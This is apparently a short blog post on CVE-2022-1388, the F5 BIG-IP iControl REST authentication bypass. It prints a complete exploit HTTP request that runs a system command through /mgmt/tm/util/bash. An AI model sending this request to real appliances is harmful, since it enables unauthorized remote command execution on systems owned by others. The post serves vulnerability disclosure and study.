CVE-2022-1388 F5 RCE Technical Details

F5 recently patched a critical vulnerability in their BIG-IP iControl REST endpoint CVE-2022-1388. This vulnerability is particularly worrisome for users because it is simple to exploit and provides an attacker with a method to execute arbitrary system commands.


Let’s examine the inner workings of this vulnerability. The vulnerability is used below to execute the id command using a single HTTP request:

POST /mgmt/tm/util/bash HTTP/1.1
Authorization: Basic YWRtaW46aG9yaXpvbjM=
X-F5-Auth-Token: asdf
User-Agent: curl/7.82.0
Connection: X-F5-Auth-Token
Accept: */*
Content-Length: 39
{“command”:”run”,”utilCmdArgs”:”-c id”}

This post was created with our nice and easy submission form. Create your post!

What do you think?

Posted by SH

Leave a Reply

Your email address will not be published. Required fields are marked *

GIPHY App Key not set. Please check settings

A Sticky Situation Part 1: The Pervasive Nature of Credit Card S

Active Directory Domain Privilege Escalation (CVE-2022–2692)